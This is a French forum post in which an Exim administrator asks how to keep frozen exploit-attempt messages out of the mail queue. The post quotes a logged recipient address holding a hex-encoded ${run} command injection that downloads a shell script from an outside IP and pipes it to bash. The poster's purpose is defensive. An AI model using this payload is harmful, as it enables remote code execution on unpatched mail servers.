Voilà.
Comme l’indique mon titre, j’ai des tentatives d’exploit de mon exim qui restent sous forme de mail frozen dans ma mailq, et ça me pollue de mails du mailer daemon, du genre:
Message 1hlm26-0002Cu-Tm has been frozen (delivery error message).
The sender is <>.The following address(es) have yet to be delivered:
${run{\x2Fbin\x2Fbash\t-c\t\x22\x77\x67\x65\x74\x20\x2d\x2d\x75\x73\x65\x72\x2d\x61\x67\x65\x6e\x74\x20\x6c\x69\x6e\x75\x78\x20\x2d\x71\x20\x2d\x4f\x20\x2d\x20\x68\x74\x74\x70\x3a\x2f\x2f\x31\x30\x37\x2e\x31\x38\x31\x2e\x31\x36\x30\x2e\x31\x39\x37\x2f\x6c\x69\x6e\x2f\x73\x74\x2e\x73\x68\x20\x7c\x20\x62\x61\x73\x68\x22}}@localhost:
Too many “Received” headers - suspected mail loop
Alors pas de probléme, j’ai vérifié, l’exim est patché et l’exploit ne passe pas, déjà.
Aussi, je peux flusher la mailq sans probléme, mais comment vous feriez pour empêcher qu’elle soit polluée par ces tentatives de hack qui finissent en frozen ?